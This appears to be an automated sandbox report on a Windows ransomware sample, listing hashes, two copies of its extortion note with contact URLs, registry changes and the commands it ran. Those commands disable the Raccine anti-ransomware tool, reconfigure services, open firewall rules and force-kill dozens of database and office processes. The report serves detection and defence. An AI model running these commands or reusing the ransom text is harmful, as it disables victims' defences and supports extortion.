8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7

Resubmissions

07-06-2021 10:08

210607-9hpr7n82ba 10

03-06-2021 20:20

210603-mpsat3rm4j 10

Analysis

max time kernel
256s
max time network
265s
platform
windows10_x64
resource
win10v20210408
submitted
03-06-2021 20:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

gVcWDWENI8.exe
Size

142KB
MD5

e1f063d63a75e0e0e864052b1a50ab06
SHA1

75d941a28cf0ade2ef2c16dfacbdeb36a51ccaf7
SHA256

8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7
SHA512

25681b210ee18bd60ba3fef496769283d51dc516569e1f1834d6d23a5927c1684b25ff67baf5fba66c908b364a13784f49facdde7a98b2fb8a8a41a2ec792ae3

Score

10^/10

evasion persistence ransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Ransom Note

YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. -------------------------------------------------------------------------------- We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. -------------------------------------------------------------------------------- As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after it's run. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. -------------------------------------------------------------------------------- !!!!!!!!!!!!!!!!!!!!!!!! If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. !!!!!!!!!!!!!!!!!!!!!!!!! -------------------------------------------------------------------------------- It doesn't matter to us what you choose pay us or we will sell your data. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: ____________________________________________________________________________________ You have two ways: 1) [Recommended] Using a TOR browser! a. Download and install TOR browser from this site: https://torproject.org/ b. Open the Tor browser. Copy the link: http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454 and paste it in the Tor browser. c. Start a chat and follow the further instructions. 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a. Open your any browser (Chrome, Firefox, Opera, IE, Edge) b. Open our secondary website: http://prometheusdec.in/ticket.php?track=141-5D9-Y454 c. Start a chat and follow the further instructions. Warning: secondary website can be blocked, thats why first variant much better and more available. _____________________________________________________________________________________ Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: w4BhZ5GUiQcxKr9s7Xlk6BkUuuwgpRtJNKf12cg2ckuKe4yYEpjMBdOCFzk0+0ywTghp7D2IVnqmdcQduontRfjN+FyZ6H3hX+3IhHpH0wqERFFvLmwSCWEk+yV2rVtQ1AIzYTP0BNmcQqEnZyhXoQ3iHaeKsPRWFvUNpDXMOkZAGsB8oZhxkuJjW37NLG8/G1d1bRquAaKDWQRelmddwlnslqGiRi4QmZqSpREnTK/nIF6QXA+Ii249kCU2OpbboO0OUJryx0nUDONQmAVpue5/w1lKmLyWPl+7AZgLFg5oC5OXvMnjWm6JqYXDE/Ls8OjQ2dNAEsUuexawOUQBTzTPXijrlp6r1NMrnj1er6TwB6kUW2QDNJV+thNELHaRB50zFL6jEv1PUDKVqojlY4CarQ0Ojr7OcHUL2C1nYvx/6db2TeVOtxe7Nx+Lw+oavinGm5zGZNieptEUevd0mavVftmtkaJnJMsYlFA/b0nTTRqcLfA4r1nrWWNRluvZ3Kj78jreJg3uTPC1gvh/g7/HCIDLLlOZk7LRuvPvgH2WFbD+ocTKqvvV+7RjW10TzKCRtV6T8I3xRfCZlphyGGb1q18HVeqQplKsd/3/2JW5fuPqE5bglmsG58P1FKhk+4vaZAMCXfaXwP26P1vwdni7n0I7PqViEikRcTBL+cM=

URLs

http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454

http://prometheusdec.in/ticket.php?track=141-5D9-Y454

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Ransom Note

YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after itâ€™s installation. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. It doesn't matter to us what you choose pay us or we will sell your data. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: You have two ways: 1) [Recommended] Using a TOR browser! a. Download and install TOR browser from this site: https://torproject.org/ b. Open the Tor browser. Copy the link: http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454 and paste it in the Tor browser. c. Start a chat and follow the further instructions. 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a. Open your any browser (Chrome, Firefox, Opera, IE, Edge) b. Open our secondary website: http://prometheusdec.in/ticket.php?track=141-5D9-Y454 c. Start a chat and follow the further instructions. Warning: secondary website can be blocked, thats why first variant much better and more available. Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: w4BhZ5GUiQcxKr9s7Xlk6BkUuuwgpRtJNKf12cg2ckuKe4yYEpjMBdOCFzk0+0ywTghp7D2IVnqmdcQduontRfjN+FyZ6H3hX+3IhHpH0wqERFFvLmwSCWEk+yV2rVtQ1AIzYTP0BNmcQqEnZyhXoQ3iHaeKsPRWFvUNpDXMOkZAGsB8oZhxkuJjW37NLG8/G1d1bRquAaKDWQRelmddwlnslqGiRi4QmZqSpREnTK/nIF6QXA+Ii249kCU2OpbboO0OUJryx0nUDONQmAVpue5/w1lKmLyWPl+7AZgLFg5oC5OXvMnjWm6JqYXDE/Ls8OjQ2dNAEsUuexawOUQBTzTPXijrlp6r1NMrnj1er6TwB6kUW2QDNJV+thNELHaRB50zFL6jEv1PUDKVqojlY4CarQ0Ojr7OcHUL2C1nYvx/6db2TeVOtxe7Nx+Lw+oavinGm5zGZNieptEUevd0mavVftmtkaJnJMsYlFA/b0nTTRqcLfA4r1nrWWNRluvZ3Kj78jreJg3uTPC1gvh/g7/HCIDLLlOZk7LRuvPvgH2WFbD+ocTKqvvV+7RjW10TzKCRtV6T8I3xRfCZlphyGGb1q18HVeqQplKsd/3/2JW5fuPqE5bglmsG58P1FKhk+4vaZAMCXfaXwP26P1vwdni7n0I7PqViEikRcTBL+cM=

URLs

http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454

http://prometheusdec.in/ticket.php?track=141-5D9-Y454

Signatures

Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Drops startup file 1 IoCs

Processes:

gVcWDWENI8.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk gVcWDWENI8.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	gVcWDWENI8.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

gVcWDWENI8.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED"	gVcWDWENI8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO"	gVcWDWENI8.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
184	taskkill.exe
2656	taskkill.exe
4020	taskkill.exe
1392	taskkill.exe
660	taskkill.exe
1264	taskkill.exe
1480	taskkill.exe
2200	taskkill.exe
2372	taskkill.exe
1192	taskkill.exe
3144	taskkill.exe
2984	taskkill.exe
2712	taskkill.exe
3176	taskkill.exe
1612	taskkill.exe
3272	taskkill.exe
2220	taskkill.exe
2648	taskkill.exe
2540	taskkill.exe
3180	taskkill.exe
2296	taskkill.exe
1812	taskkill.exe
2984	taskkill.exe
3864	taskkill.exe
3720	taskkill.exe
1484	taskkill.exe
2536	taskkill.exe
2452	taskkill.exe
2176	taskkill.exe
3728	taskkill.exe
3868	taskkill.exe
3524	taskkill.exe
3180	taskkill.exe
2008	taskkill.exe
3956	taskkill.exe
3364	taskkill.exe
2392	taskkill.exe
2128	taskkill.exe
2656	taskkill.exe
2612	taskkill.exe
756	taskkill.exe
2376	taskkill.exe
428	taskkill.exe
2392	taskkill.exe
2296	taskkill.exe
1516	taskkill.exe
3176	taskkill.exe
3628	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1812 reg.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3524 PING.EXE

pid	process
1812	reg.exe

pid	process
3524	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

gVcWDWENI8.exe

pid	process
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe
4068	gVcWDWENI8.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

gVcWDWENI8.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4068	gVcWDWENI8.exe
Token: SeDebugPrivilege	3144	taskkill.exe
Token: SeDebugPrivilege	3720	taskkill.exe
Token: SeDebugPrivilege	2128	taskkill.exe
Token: SeDebugPrivilege	1484	taskkill.exe
Token: SeDebugPrivilege	3524	taskkill.exe
Token: SeDebugPrivilege	2536	taskkill.exe
Token: SeDebugPrivilege	660	taskkill.exe
Token: SeDebugPrivilege	3180	taskkill.exe
Token: SeDebugPrivilege	2008	taskkill.exe
Token: SeDebugPrivilege	2452	taskkill.exe
Token: SeDebugPrivilege	2656	taskkill.exe
Token: SeDebugPrivilege	1264	taskkill.exe
Token: SeDebugPrivilege	2220	taskkill.exe
Token: SeDebugPrivilege	2648	taskkill.exe
Token: SeDebugPrivilege	2612	taskkill.exe
Token: SeDebugPrivilege	2984	taskkill.exe
Token: SeDebugPrivilege	756	taskkill.exe
Token: SeDebugPrivilege	2392	taskkill.exe
Token: SeDebugPrivilege	2540	taskkill.exe
Token: SeDebugPrivilege	2176	taskkill.exe
Token: SeDebugPrivilege	2712	taskkill.exe
Token: SeDebugPrivilege	184	taskkill.exe
Token: SeDebugPrivilege	3176	taskkill.exe
Token: SeDebugPrivilege	2296	taskkill.exe
Token: SeDebugPrivilege	3956	taskkill.exe
Token: SeDebugPrivilege	2376	taskkill.exe
Token: SeDebugPrivilege	1516	taskkill.exe
Token: SeDebugPrivilege	1612	taskkill.exe
Token: SeDebugPrivilege	1480	taskkill.exe
Token: SeDebugPrivilege	3180	taskkill.exe
Token: SeDebugPrivilege	2656	taskkill.exe
Token: SeDebugPrivilege	2200	taskkill.exe
Token: SeDebugPrivilege	428	taskkill.exe
Token: SeDebugPrivilege	3728	taskkill.exe
Token: SeDebugPrivilege	3176	taskkill.exe
Token: SeDebugPrivilege	2392	taskkill.exe
Token: SeDebugPrivilege	4020	taskkill.exe
Token: SeDebugPrivilege	3364	taskkill.exe
Token: SeDebugPrivilege	2296	taskkill.exe
Token: SeDebugPrivilege	3628	taskkill.exe
Token: SeDebugPrivilege	2372	taskkill.exe
Token: SeDebugPrivilege	2984	taskkill.exe
Token: SeDebugPrivilege	1392	taskkill.exe
Token: SeDebugPrivilege	1192	taskkill.exe
Token: SeDebugPrivilege	3864	taskkill.exe
Token: SeDebugPrivilege	3868	taskkill.exe
Token: SeDebugPrivilege	1812	taskkill.exe
Token: SeDebugPrivilege	3720	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

gVcWDWENI8.exe

pid process

4068 gVcWDWENI8.exe
4068 gVcWDWENI8.exe
4068 gVcWDWENI8.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

gVcWDWENI8.exe

pid process

4068 gVcWDWENI8.exe
4068 gVcWDWENI8.exe
4068 gVcWDWENI8.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

gVcWDWENI8.exe

description	pid	process	target process
PID 4068 wrote to memory of 3144	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 3144	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 212	4068	gVcWDWENI8.exe	reg.exe
PID 4068 wrote to memory of 212	4068	gVcWDWENI8.exe	reg.exe
PID 4068 wrote to memory of 1812	4068	gVcWDWENI8.exe	reg.exe
PID 4068 wrote to memory of 1812	4068	gVcWDWENI8.exe	reg.exe
PID 4068 wrote to memory of 2920	4068	gVcWDWENI8.exe	schtasks.exe
PID 4068 wrote to memory of 2920	4068	gVcWDWENI8.exe	schtasks.exe
PID 4068 wrote to memory of 2704	4068	gVcWDWENI8.exe	sc.exe
PID 4068 wrote to memory of 2704	4068	gVcWDWENI8.exe	sc.exe
PID 4068 wrote to memory of 1192	4068	gVcWDWENI8.exe	sc.exe
PID 4068 wrote to memory of 1192	4068	gVcWDWENI8.exe	sc.exe
PID 4068 wrote to memory of 4020	4068	gVcWDWENI8.exe	sc.exe
PID 4068 wrote to memory of 4020	4068	gVcWDWENI8.exe	sc.exe
PID 4068 wrote to memory of 3856	4068	gVcWDWENI8.exe	netsh.exe
PID 4068 wrote to memory of 3856	4068	gVcWDWENI8.exe	netsh.exe
PID 4068 wrote to memory of 8	4068	gVcWDWENI8.exe	sc.exe
PID 4068 wrote to memory of 8	4068	gVcWDWENI8.exe	sc.exe
PID 4068 wrote to memory of 2504	4068	gVcWDWENI8.exe	sc.exe
PID 4068 wrote to memory of 2504	4068	gVcWDWENI8.exe	sc.exe
PID 4068 wrote to memory of 3056	4068	gVcWDWENI8.exe	sc.exe
PID 4068 wrote to memory of 3056	4068	gVcWDWENI8.exe	sc.exe
PID 4068 wrote to memory of 2200	4068	gVcWDWENI8.exe	sc.exe
PID 4068 wrote to memory of 2200	4068	gVcWDWENI8.exe	sc.exe
PID 4068 wrote to memory of 1392	4068	gVcWDWENI8.exe	sc.exe
PID 4068 wrote to memory of 1392	4068	gVcWDWENI8.exe	sc.exe
PID 4068 wrote to memory of 3720	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 3720	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 1484	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 1484	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 2128	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 2128	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 3524	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 3524	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 2536	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 2536	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 660	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 660	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 3180	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 3180	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 2008	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 2008	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 2452	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 2452	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 2656	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 2656	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 1264	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 1264	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 2220	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 2220	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 2648	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 2648	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 2612	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 2612	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 2984	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 2984	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 756	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 756	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 2392	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 2392	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 2540	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 2540	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 2176	4068	gVcWDWENI8.exe	taskkill.exe
PID 4068 wrote to memory of 2176	4068	gVcWDWENI8.exe	taskkill.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

gVcWDWENI8.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	gVcWDWENI8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	gVcWDWENI8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED"	gVcWDWENI8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO"	gVcWDWENI8.exe

C:\Users\Admin\AppData\Local\Temp\gVcWDWENI8.exe
"C:\Users\Admin\AppData\Local\Temp\gVcWDWENI8.exe"
1⤵
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4068
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3144
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:212
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:1812
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:2920
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:2704
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:1192
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:4020
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:3856
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:8
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:2504
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:3056
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:2200
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:1392
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3720
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1484
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2128
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3524
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:660
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2536
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:3180
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2008
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2452
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  PID:2656
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1264
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2220
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2648
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2612
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2984
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:756
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  PID:2392
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2540
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2176
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2712
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:184
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  PID:3176
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  PID:2296
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3956
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2376
